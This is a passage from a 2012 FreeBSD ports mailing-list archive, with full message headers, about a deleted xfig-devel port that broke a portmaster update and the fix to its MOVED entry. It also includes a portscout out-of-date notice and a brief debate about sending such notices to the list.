b=DwkgN4PykelEtPx4NiRAJ/Ctcp3Dt+Lb0R6Wm2j/wqDNdX8esO6WG9JMMjQA7lJBp5 PKLMDE/BwWMeuFDWu/rJKcgPa/sdmB1caSg754UjV/erv/Hc8eg7kNzmWFc/eZBt1uZ9 tQikynMdYUIN5ca7IdqoAWJ807SdiIlNwu5zq5MHS0uZZflTXa0Olj6YOw/l0KpNPR0m AuN1TAGLizPny85qfsy10EKF93u6APXYfG12XLicYvP2N+0lnXjmInJR9gUrDbC489m1 jHYBBaBP5MLeiw6ZNd4R/u+lMOWavNek0FY0BaDMCpVOAU64CLmzvdAOnoNxqAo18HMe j/cw== Received: by 10.152.108.48 with SMTP id hh16mr17975135lab.25.1354110418637; Wed, 28 Nov 2012 05:46:58 -0800 (PST) MIME-Version: 1.0 Received: by 10.112.154.168 with HTTP; Wed, 28 Nov 2012 05:46:28 -0800 (PST) In-Reply-To: <20121128134330.GG2617@albert.catwhisker.org> References: <20121128134330.GG2617@albert.catwhisker.org> From: Eitan Adler Date: Wed, 28 Nov 2012 08:46:28 -0500 Message-ID: Subject: Re: Evasive action may be needed: graphics/xfig-devel port deleted To: David Wolfskill , Baptiste Daroussin Content-Type: text/plain; charset=UTF-8 X-Gm-Message-State: ALoCoQkZZZJciiQCqRFm16HAQN8WN9QYV+AdIBjGJQ7HQ7KV+xKbRXlAzAmKSf31Jzy1Vpx4HAmy Cc: freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 13:47:00 -0000 On 28 November 2012 08:43, David Wolfskill wrote: > I found out about this during may normal daily "portmaster -ad" run, > which is one of the worst points for it to happen, as: > > ... > ===>>> The graphics/xfig-devel port has been deleted: Has expired: Stable version is more recent than devel version > ===>>> Aborting update > > Terminated > > Script done on Wed Nov 28 04:21:13 2012 > > > As I had actually checked /usr/ports/UPDATING (so I would know in > advance of running portmaster of any evasive action I might need to > take), and saw that the most recent entry was still the one for > devel/git from 12 Nov, I was rather surprised (and not in a good way). > > After running "portmaster -o graphics/xfig graphics/xfig-devel", I was > able to proceed, but I would have appreciated an UPDATING entry. There is a file called MOVED which gives this information. I think in this case it may be worthwhile to change the graphics/xfig-devel entry to include |graphics/xfig| -- Eitan Adler From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 14:01:40 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 986B2B90; Wed, 28 Nov 2012 14:01:40 +0000 (UTC) (envelope-from david@catwhisker.org) Received: from albert.catwhisker.org (m209-73.dsl.rawbw.com [198.144.209.73]) by mx1.freebsd.org (Postfix) with ESMTP id D608D8FC0C; Wed, 28 Nov 2012 14:01:39 +0000 (UTC) Received: from albert.catwhisker.org (localhost [127.0.0.1]) by albert.catwhisker.org (8.14.5/8.14.5) with ESMTP id qASE1cTe037734; Wed, 28 Nov 2012 06:01:38 -0800 (PST) (envelope-from david@albert.catwhisker.org) Received: (from david@localhost) by albert.catwhisker.org (8.14.5/8.14.5/Submit) id qASE1cUG037733; Wed, 28 Nov 2012 06:01:38 -0800 (PST) (envelope-from david) Date: Wed, 28 Nov 2012 06:01:38 -0800 From: David Wolfskill To: Eitan Adler Subject: Re: Evasive action may be needed: graphics/xfig-devel port deleted Message-ID: <20121128140138.GH2617@albert.catwhisker.org> References: <20121128134330.GG2617@albert.catwhisker.org> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="SIpeN1L2gmCc/JOo" Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.5.21 (2010-09-15) Cc: Baptiste Daroussin , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 14:01:40 -0000 --SIpeN1L2gmCc/JOo Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Nov 28, 2012 at 08:46:28AM -0500, Eitan Adler wrote: > ... > > After running "portmaster -o graphics/xfig graphics/xfig-devel", I was > > able to proceed, but I would have appreciated an UPDATING entry. >=20 > There is a file called MOVED which gives this information. Of course. But with g1-227(10.0-C)[3] ls -1 /var/db/pkg | wc -l 732 700+ ports installed on this machine (my laptop), grepping for each of them daily is absurd. (I thought MOVED was intended more for programmatic parsing than human readability anyway....) > I think in this case it may be worthwhile to > change the graphics/xfig-devel entry to include |graphics/xfig| > ... I have no quarrel with the MOVED entry as it is presently constructed: the whine that portmaster issued was clear and understandable. That it casued the entire process to terminate is annoying. It seems to me that this is exactly the kind of situation for which UPDATING entries have been created in the past. And since there wasn't one for this one, I felt rather blindsided, which is rarely (if ever) pleasant. It is almost certain that an UPDATING entry would have allowed me to avoid the negative effects. Peace, david --=20 David H. Wolfskill david@catwhisker.org Taliban: Evil men with guns afraid of truth from a 14-year old girl. See http://www.catwhisker.org/~david/publickey.gpg for my public key. --SIpeN1L2gmCc/JOo Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (FreeBSD) iEYEARECAAYFAlC2GUEACgkQmprOCmdXAD1rmACeMg4ic+Fa3KIE/ptuLsOOTuWS rj4AnjTO1H1ooDTaCEK/sXK6lNFmMh5U =h7+M -----END PGP SIGNATURE----- --SIpeN1L2gmCc/JOo-- From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 14:06:54 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 9FFFBCB0 for ; Wed, 28 Nov 2012 14:06:54 +0000 (UTC) (envelope-from baptiste.daroussin@gmail.com) Received: from mail-ee0-f54.google.com (mail-ee0-f54.google.com [74.125.83.54]) by mx1.freebsd.org (Postfix) with ESMTP id 25F3C8FC17 for ; Wed, 28 Nov 2012 14:06:53 +0000 (UTC) Received: by mail-ee0-f54.google.com with SMTP id c13so9378918eek.13 for ; Wed, 28 Nov 2012 06:06:53 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=sender:date:from:to:cc:subject:message-id:references:mime-version :content-type:content-disposition:in-reply-to:user-agent; bh=hbAJZO/DkrDB26NAb+yoYW+YuMy/zE5J0tzuA+oOVuI=; b=A4IdpEWQQiTAMBPaw5PIefw0eIGOTeUxiDDDpEYFwknhkbzIsRldDdD9mH5vINWFnu VdF01dNagrldOuYa+qoxzHMY41dpK5wVdl1asC5Hm5zXjgOB5KZmL6qr3fmWWiM4wCHQ X4RvSSVkPzTdZTP6CT+fdY5Nj+dwm2Lbr+WVEj38nCijhFxD+TK4n+nGbBj3KohT6fvw EGejHH+QKJLJki0YN7BGP9aK9bR8x3jBm5bjAAIn9CzJFqCleHUZNk5SR414zTYFGAdN DeiykSe2eQQupgLNsORrzHVuzzAPVUyzrPYN9dl2Oe1Zp0yoe9eVtsf/gJQemtTaakto wNgw== Received: by 10.14.203.2 with SMTP id e2mr69874983eeo.20.1354111613182; Wed, 28 Nov 2012 06:06:53 -0800 (PST) Received: from ithaqua.etoilebsd.net (ithaqua.etoilebsd.net. [37.59.37.188]) by mx.google.com with ESMTPS id q2sm47265196eem.13.2012.11.28.06.06.52 (version=TLSv1/SSLv3 cipher=OTHER); Wed, 28 Nov 2012 06:06:52 -0800 (PST) Sender: Baptiste Daroussin Date: Wed, 28 Nov 2012 15:06:50 +0100 From: Baptiste Daroussin To: Eitan Adler Subject: Re: Evasive action may be needed: graphics/xfig-devel port deleted Message-ID: <20121128140650.GC97474@ithaqua.etoilebsd.net> References: <20121128134330.GG2617@albert.catwhisker.org> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="ALfTUftag+2gvp1h" Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.5.21 (2010-09-15) Cc: freebsd-ports@freebsd.org, David Wolfskill X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 14:06:54 -0000 --ALfTUftag+2gvp1h Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Nov 28, 2012 at 08:46:28AM -0500, Eitan Adler wrote: > On 28 November 2012 08:43, David Wolfskill wrote: > > I found out about this during may normal daily "portmaster -ad" run, > > which is one of the worst points for it to happen, as: > > > > ... > > =3D=3D=3D>>> The graphics/xfig-devel port has been deleted: Has expired= : Stable version is more recent than devel version > > =3D=3D=3D>>> Aborting update > > > > Terminated > > > > Script done on Wed Nov 28 04:21:13 2012 > > > > > > As I had actually checked /usr/ports/UPDATING (so I would know in > > advance of running portmaster of any evasive action I might need to > > take), and saw that the most recent entry was still the one for > > devel/git from 12 Nov, I was rather surprised (and not in a good way). > > > > After running "portmaster -o graphics/xfig graphics/xfig-devel", I was > > able to proceed, but I would have appreciated an UPDATING entry. >=20 > There is a file called MOVED which gives this information. I think in > this case it may be worthwhile to > change the graphics/xfig-devel entry to include |graphics/xfig| >=20 >=20 >=20 > --=20 > Eitan Adler I've just done it. regards, Bapt --ALfTUftag+2gvp1h Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (FreeBSD) iEYEARECAAYFAlC2GnoACgkQ8kTtMUmk6Ewg3ACfZs2IiL4xgvmnAyqDqUWQpf8p 6agAoIysma/FTt8nwm3LsemWfmMdncKL =lBNR -----END PGP SIGNATURE----- --ALfTUftag+2gvp1h-- From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 14:09:10 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 449D8F1B for ; Wed, 28 Nov 2012 14:09:10 +0000 (UTC) (envelope-from baptiste.daroussin@gmail.com) Received: from mail-ea0-f182.google.com (mail-ea0-f182.google.com [209.85.215.182]) by mx1.freebsd.org (Postfix) with ESMTP id AE4A78FC08 for ; Wed, 28 Nov 2012 14:09:09 +0000 (UTC) Received: by mail-ea0-f182.google.com with SMTP id a14so4657972eaa.13 for ; Wed, 28 Nov 2012 06:09:08 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=sender:date:from:to:cc:subject:message-id:references:mime-version :content-type:content-disposition:in-reply-to:user-agent; bh=L1bZmzClDlycMSfE8mSKsVoMlowOqRisG1+ExgdWA5c=; b=ZsBm8Th0ukeZhYHk0y/I1lSzj4fedp41mRrQ7s/cNgFrJzG/7T7jctKoxcpnYbvuGu A511c6GTu/bK/q21vYcPG3omlu6mYpNs/7pB3e31UC54HkqkqRByXKw6fMqvzTVgI2MF cVj0xFQ/1g6OuH9TufkWgIDHPNGKMIUlh8NsMx1xSVkH1HnyYByQpV19EzoI5embhR5C pE8exDSLaeT4Bvkr8Q1GrksiWfatuk43926EGOSDTgnN5F04yFFzLBw9+goZALFuqFnt K/maqwqyn3dYe3Jumtgt9NZMqvHN3oEYUXyQ6GdNIrbeteW+0YTa1o1SCCFXnhT2P7X+ 81xg== Received: by 10.14.184.131 with SMTP id s3mr14237198eem.38.1354111748592; Wed, 28 Nov 2012 06:09:08 -0800 (PST) Received: from ithaqua.etoilebsd.net (ithaqua.etoilebsd.net. [37.59.37.188]) by mx.google.com with ESMTPS id u45sm41121779eep.0.2012.11.28.06.09.07 (version=TLSv1/SSLv3 cipher=OTHER); Wed, 28 Nov 2012 06:09:07 -0800 (PST) Sender: Baptiste Daroussin Date: Wed, 28 Nov 2012 15:09:05 +0100 From: Baptiste Daroussin To: David Wolfskill Subject: Re: Evasive action may be needed: graphics/xfig-devel port deleted Message-ID: <20121128140905.GD97474@ithaqua.etoilebsd.net> References: <20121128134330.GG2617@albert.catwhisker.org> <20121128140138.GH2617@albert.catwhisker.org> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="/unnNtmY43mpUSKx" Content-Disposition: inline In-Reply-To: <20121128140138.GH2617@albert.catwhisker.org> User-Agent: Mutt/1.5.21 (2010-09-15) Cc: Eitan Adler , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 14:09:10 -0000 --/unnNtmY43mpUSKx Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Nov 28, 2012 at 06:01:38AM -0800, David Wolfskill wrote: > On Wed, Nov 28, 2012 at 08:46:28AM -0500, Eitan Adler wrote: > > ... > > > After running "portmaster -o graphics/xfig graphics/xfig-devel", I was > > > able to proceed, but I would have appreciated an UPDATING entry. > >=20 > > There is a file called MOVED which gives this information. >=20 > Of course. But with >=20 > g1-227(10.0-C)[3] ls -1 /var/db/pkg | wc -l > 732 >=20 > 700+ ports installed on this machine (my laptop), grepping for each of > them daily is absurd. (I thought MOVED was intended more for > programmatic parsing than human readability anyway....) >=20 > > I think in this case it may be worthwhile to > > change the graphics/xfig-devel entry to include |graphics/xfig| > > ... >=20 > I have no quarrel with the MOVED entry as it is presently constructed: > the whine that portmaster issued was clear and understandable. That it > casued the entire process to terminate is annoying. >=20 Normally portmaster just understand MOVED correctly, if I had correctly set= the graphics/xfig in it, it would have been straight forward for you. Sorry the first entry was wrong, should be fixed now regards, Bapt --/unnNtmY43mpUSKx Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (FreeBSD) iEYEARECAAYFAlC2GwEACgkQ8kTtMUmk6Ew7DwCgnMmctukMG1aLaEa8UuUgTEFv XggAn0ceKYWSVM3gSnO/CWtO/18djhtn =0Cn1 -----END PGP SIGNATURE----- --/unnNtmY43mpUSKx-- From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 14:17:56 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 3E4081E6; Wed, 28 Nov 2012 14:17:56 +0000 (UTC) (envelope-from david@catwhisker.org) Received: from albert.catwhisker.org (m209-73.dsl.rawbw.com [198.144.209.73]) by mx1.freebsd.org (Postfix) with ESMTP id E1C5D8FC08; Wed, 28 Nov 2012 14:17:55 +0000 (UTC) Received: from albert.catwhisker.org (localhost [127.0.0.1]) by albert.catwhisker.org (8.14.5/8.14.5) with ESMTP id qASEHtwP038130; Wed, 28 Nov 2012 06:17:55 -0800 (PST) (envelope-from david@albert.catwhisker.org) Received: (from david@localhost) by albert.catwhisker.org (8.14.5/8.14.5/Submit) id qASEHtMY038129; Wed, 28 Nov 2012 06:17:55 -0800 (PST) (envelope-from david) Date: Wed, 28 Nov 2012 06:17:55 -0800 From: David Wolfskill To: Baptiste Daroussin Subject: Re: Evasive action may be needed: graphics/xfig-devel port deleted Message-ID: <20121128141755.GI2617@albert.catwhisker.org> References: <20121128134330.GG2617@albert.catwhisker.org> <20121128140138.GH2617@albert.catwhisker.org> <20121128140905.GD97474@ithaqua.etoilebsd.net> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="rPKw41Fi6dB0MaHy" Content-Disposition: inline In-Reply-To: <20121128140905.GD97474@ithaqua.etoilebsd.net> User-Agent: Mutt/1.5.21 (2010-09-15) Cc: freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 14:17:56 -0000 --rPKw41Fi6dB0MaHy Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Nov 28, 2012 at 03:09:05PM +0100, Baptiste Daroussin wrote: > ... > > the whine that portmaster issued was clear and understandable. That it > > casued the entire process to terminate is annoying. > >=20 >=20 > Normally portmaster just understand MOVED correctly, if I had correctly s= et the > graphics/xfig in it, it would have been straight forward for you. Oh...! OK; *now* I see the reason for Eitan's suggestion. :-} (Sorry for misunderstanding earlier.) > Sorry the first entry was wrong, should be fixed now Thanks! (I have a couple more machines that will be updated on the weekend that this could affect.) And I do understand that regardless of what tools & toys we use, software development is a human endeavor, and as such, things we would rather avoid will certainly happen from time to time. :-} Peace, david --=20 David H. Wolfskill david@catwhisker.org Taliban: Evil men with guns afraid of truth from a 14-year old girl. See http://www.catwhisker.org/~david/publickey.gpg for my public key. --rPKw41Fi6dB0MaHy Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (FreeBSD) iEYEARECAAYFAlC2HRIACgkQmprOCmdXAD3gGgCdFHCYQEx5xV2+lZJxdaWb8/J4 zgIAoIDHPFvWKMcUzK/DlI9lxzg41rzV =aJY6 -----END PGP SIGNATURE----- --rPKw41Fi6dB0MaHy-- From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 14:55:41 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 8AFF5BD2 for ; Wed, 28 Nov 2012 14:55:41 +0000 (UTC) (envelope-from portscout@portscout.freebsd.org) Received: from null.zi0r.com (null.zi0r.com [71.245.171.204]) by mx1.freebsd.org (Postfix) with ESMTP id 433478FC1F for ; Wed, 28 Nov 2012 14:55:41 +0000 (UTC) Received: from null.zi0r.com (localhost [127.0.0.1]) by null.zi0r.com (8.14.5/8.14.5) with ESMTP id qASEtewW092085 for ; Wed, 28 Nov 2012 09:55:40 -0500 (EST) (envelope-from portscout@portscout.freebsd.org) Received: (from portscout@localhost) by null.zi0r.com (8.14.5/8.14.5/Submit) id qASEtekr091810; Wed, 28 Nov 2012 09:55:40 -0500 (EST) (envelope-from portscout) Message-Id: <201211281455.qASEtekr091810@null.zi0r.com> MIME-Version: 1.0 Content-Disposition: inline Content-Transfer-Encoding: 8bit Content-Type: text/plain Date: Wed, 28 Nov 2012 09:55:40 -0500 From: portscout@portscout.freebsd.org To: ports@freebsd.org Subject: FreeBSD ports you maintain which are out of date X-Mailer: portscout/0.8.1 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 14:55:41 -0000 Dear port maintainer, The portscout new distfile checker has detected that one or more of your ports appears to be out of date. Please take the opportunity to check each of the ports listed below, and if possible and appropriate, submit/commit an update. If any ports have already been updated, you can safely ignore the entry. You will not be e-mailed again for any of the port/version combinations below. Full details can be found at the following URL: http://portscout.freebsd.org/ports@freebsd.org.html Port | Current version | New version ------------------------------------------------+-----------------+------------ devel/p5-DateTime-Format-Flexible | 0.23 | 0.24 ------------------------------------------------+-----------------+------------ www/openacs-dotlrn | 2.5.0 | 3.0.0 ------------------------------------------------+-----------------+------------ If any of the above results are invalid, please check the following page for details on how to improve portscout's detection and selection of distfiles on a per-port basis: http://portscout.freebsd.org/info/portscout-portconfig.txt If wish to stop receiving portscout reminders, please contact portscout@portscout.freebsd.org Thanks. From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 15:10:38 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 7E0F310F for ; Wed, 28 Nov 2012 15:10:38 +0000 (UTC) (envelope-from lists@eitanadler.com) Received: from mail-la0-f54.google.com (mail-la0-f54.google.com [209.85.215.54]) by mx1.freebsd.org (Postfix) with ESMTP id D3CC08FC08 for ; Wed, 28 Nov 2012 15:10:37 +0000 (UTC) Received: by mail-la0-f54.google.com with SMTP id j13so13131284lah.13 for ; Wed, 28 Nov 2012 07:10:35 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=eitanadler.com; s=0xdeadbeef; h=mime-version:in-reply-to:references:from:date:message-id:subject:to :cc:content-type; bh=8DgbmwhljK0KIZdv/OGomDyRBkXNFpb6+xaZmn422gA=; b=gsHWOfziGRkLWprVk8qFsmkGL8H4iswMcFydsW4yGtWPAho8JbKx43AGnqsb3R/p7C aq3Sk5NUprPrLNwfMdJfcomBj+n5O+hSLfVqJt5InJprCw/BN9JzprGB5R9VJpkAyRRm 0tCxy+gtaJOnTUYUsU3D211Q6AjQS41Bqaopw= X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=20120113; h=mime-version:in-reply-to:references:from:date:message-id:subject:to :cc:content-type:x-gm-message-state; bh=8DgbmwhljK0KIZdv/OGomDyRBkXNFpb6+xaZmn422gA=; b=hDWL0HPUF4Xe56Ym54YZb+KMYVoVtOH2TBnMC1CP/WSzsOr3NZJRBz4OKZ3lPjYVBP Gpp/JWm94HURjZIa3s+yr29se3A4Tk0BovQx/0437JRt8yhxz+yvgaFi/zddFk1lt39p ZB2i4SxbbIP8Vv915jotKRvQsyfiUTAS7Svndbrq2zDuNy/fVcVA4rTm8vxbY9s9gh+a M/nvDtMnSUCovS4762aZTunZ8VdbmOYUCyWKMM+M9S2WUiFxv8IHT639pWnOdgF5RYpN 1xr1IF83h1gyyt5O7RO7QAK9NsqJolFzXOciADndqDzWpIhX+H/f0QVLgaIc9gUljHCQ GcqQ== Received: by 10.112.50.109 with SMTP id b13mr8156194lbo.8.1354115435639; Wed, 28 Nov 2012 07:10:35 -0800 (PST) MIME-Version: 1.0 Received: by 10.112.154.168 with HTTP; Wed, 28 Nov 2012 07:10:05 -0800 (PST) In-Reply-To: <20121128140650.GC97474@ithaqua.etoilebsd.net> References: <20121128134330.GG2617@albert.catwhisker.org> <20121128140650.GC97474@ithaqua.etoilebsd.net> From: Eitan Adler Date: Wed, 28 Nov 2012 10:10:05 -0500 Message-ID: Subject: Re: Evasive action may be needed: graphics/xfig-devel port deleted To: Baptiste Daroussin Content-Type: text/plain; charset=UTF-8 X-Gm-Message-State: ALoCoQmdm5Y8GXW22KaDPHpQ3EWcuu/VHUnZ2Zqu0M65f0wpJ46MRs5yZ3WN/CBYeuOoHprVNm0+ Cc: freebsd-ports@freebsd.org, David Wolfskill X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 15:10:38 -0000 On 28 November 2012 09:06, Baptiste Daroussin wrote: > On Wed, Nov 28, 2012 at 08:46:28AM -0500, Eitan Adler wrote: > > I've just done it. Thanks! -- Eitan Adler From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 15:16:22 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id EB12850A for ; Wed, 28 Nov 2012 15:16:22 +0000 (UTC) (envelope-from prvs=672f17c13=pschmehl_lists@tx.rr.com) Received: from ip-001.utdallas.edu (ip-001.utdallas.edu [129.110.20.107]) by mx1.freebsd.org (Postfix) with ESMTP id AADD18FC0C for ; Wed, 28 Nov 2012 15:16:22 +0000 (UTC) X-Group: None X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AmwHAOQptlCBbgogOmdsb2JhbABFwCsDAQEBARkIS4IeAQEEATgCNAsFCwsOCi5DFAYBEogJBr5/jD8bg0VhA4heoHaBTQ X-IronPort-AV: E=Sophos;i="4.84,179,1355119200"; d="scan'208";a="109735755" Received: from zxtm01.utdallas.edu (HELO utd71538.utdallas.edu) ([129.110.10.32]) by ip-001.utdallas.edu with ESMTP/TLS/DHE-RSA-AES256-SHA; 28 Nov 2012 09:16:19 -0600 Date: Wed, 28 Nov 2012 09:16:17 -0600 From: Paul Schmehl To: Shane Ambler , Kevin Oberman Subject: Re: FreeBSD ports you maintain which are out of date Message-ID: <31BBFCB108C82225ADF20511@utd71538.campus.ad.utdallas.edu> In-Reply-To: <50B56392.9060506@ShaneWare.Biz> References: <201211271554.qARFs9un067018@null.zi0r.com> <50B4E664.6030606@filez.com> <50B56392.9060506@ShaneWare.Biz> X-Mailer: Mulberry/4.1.0a1 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline; size=1387 Cc: ports@freebsd.org, portscout@portscout.zi0r.com, Radim Kolar X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list Reply-To: Paul Schmehl List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 15:16:23 -0000 --On November 28, 2012 11:36:26 AM +1030 Shane Ambler wrote: > On 28/11/2012 09:45, Kevin Oberman wrote: >> On Tue, Nov 27, 2012 at 8:12 AM, Radim Kolar wrote: >>> can be this daily spam turned off? i emailed there >>> >>> portscout@portscout.freebsd.org >>> >>> but message was not delivered >> >> It's not spam, but a very useful service. I you don't work on any >> ports, you should be able to filter it very easily with procmail or >> your mail reader. >> > > Probably more to the point is that it shouldn't get sent to the ports > mailing list - just to port maintainers. > Did you ever think that sending it to the list might motivate someone else to take over the port? There's a reason ports get out of date. One of the reasons is because the port maintainer has lost interest or no longer has the time. If people on the list see it, someone who is motivated might update the port and end up being its new maintainer. -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. ******************************************* "It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead." Thomas Jefferson "There are some ideas so wrong that only a very intelligent person could believe in them." George Orwell From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 15:45:40 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id EC77FF2E for ; Wed, 28 Nov 2012 15:45:40 +0000 (UTC) (envelope-from yerenkow@gmail.com) Received: from mail-wi0-f174.google.com (mail-wi0-f174.google.com [209.85.212.174]) by mx1.freebsd.org (Postfix) with ESMTP id 6FAC38FC0C for ; Wed, 28 Nov 2012 15:45:40 +0000 (UTC) Received: by mail-wi0-f174.google.com with SMTP id hm9so4804689wib.13 for ; Wed, 28 Nov 2012 07:45:33 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; bh=cw6XhccLhYHoIBKLczYjVCxGC4HFVuYUGp8GwK/Hajg=; b=Ue4eo6ZrT46vOoiHKOut/QJYw0sVWavh7VXiq+FzEXLlftpvddd9Dv+tLI4RuJ1G77 JWEcDhgDHiyrSfaWpAl9jHB9rEPAsVTQkjY9KUlmCg5RMQjwBQRzZBX2Pe5z6OA9OAuT R5fKGs/EABNT3pLdZpLv2cmtThKSEB8e0rM8lxiChscPanuFiSt0W1KhlUy2tmUnJS9s bpsrDMu6CqdchuYoTsXOBILuCAN2jrAQYaWVrWml528SfMN9Femlzn2pH024gf3XEv+M EimQgBi2R9fQlMu8Z4tIF0EWYhmQKzDltXyHOWJHRbx7cyGKAIJuaN5ASTq34OHwZhbM sFVA== MIME-Version: 1.0 Received: by 10.216.225.232 with SMTP id z82mr7234116wep.151.1354117533268; Wed, 28 Nov 2012 07:45:33 -0800 (PST) Received: by 10.194.40.131 with HTTP; Wed, 28 Nov 2012 07:45:33 -0800 (PST) Received: by 10.194.40.131 with HTTP; Wed, 28 Nov 2012 07:45:33 -0800 (PST) In-Reply-To: <31BBFCB108C82225ADF20511@utd71538.campus.ad.utdallas.edu> References: <201211271554.qARFs9un067018@null.zi0r.com> <50B4E664.6030606@filez.com> <50B56392.9060506@ShaneWare.Biz> <31BBFCB108C82225ADF20511@utd71538.campus.ad.utdallas.edu> Date: Wed, 28 Nov 2012 17:45:33 +0200 Message-ID: Subject: Re: FreeBSD ports you maintain which are out of date From: Alexander Yerenkow To: Paul Schmehl Content-Type: text/plain; charset=ISO-8859-1 X-Content-Filtered-By: Mailman/MimeDel 2.1.14 Cc: ports@freebsd.org, portscout@portscout.zi0r.com, Shane Ambler , Kevin Oberman , Radim Kolar X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 15:45:41 -0000 In that case, near each port should be.mntr contact mentioned, to.make it easier for anyone to contact mntr immediately, instead making additional unnecessary steps. Regards, Alexander Yerenkow From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 16:45:58 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org 